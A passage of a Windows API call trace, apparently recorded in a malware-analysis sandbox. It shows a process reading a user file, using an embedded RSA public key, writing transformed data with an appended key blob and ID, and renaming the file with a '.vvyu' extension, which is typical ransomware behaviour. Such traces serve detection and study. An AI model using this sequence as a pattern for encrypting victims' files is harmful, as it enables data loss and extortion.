hFile=0x510, liDistanceToMove=0x2317, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.536] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.538] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.539] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x233d, lpOverlapped=0x0) returned 1 [0203.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.540] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0203.541] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.541] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.541] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.541] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.541] GetLastError () returned 0x0 [0203.541] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.541] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0203.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.542] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.542] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.542] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2340) returned 0x2ea99b0 [0203.542] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea2020 [0203.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea2068 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3860 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.543] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0203.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3860 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3818 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3800 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0203.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0203.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.546] GetCurrentThreadId () returned 0x66c [0203.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3e70 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.547] GetCurrentThreadId () returned 0x66c [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3860 [0203.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0203.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3818 [0203.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3878 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3848 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3890 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3830 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3800 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0203.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0203.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3890 | out: hHeap=0x620000) returned 1 [0203.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0203.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0203.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3878 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0203.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2068 | out: hHeap=0x620000) returned 1 [0203.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.560] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x2338, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x2338, lpOverlapped=0x0) returned 1 [0203.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.561] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x233d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.561] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.563] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.563] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.563] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.564] CloseHandle (hObject=0x510) returned 1 [0203.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0203.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0203.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0203.565] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\LA08Fq2WwngfS3W9kC.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\la08fq2wwngfs3w9kc.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\LA08Fq2WwngfS3W9kC.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\la08fq2wwngfs3w9kc.swf.vvyu")) returned 1 [0203.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.568] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0203.571] FindNextFileW (in: hFindFile=0x2cfe100, 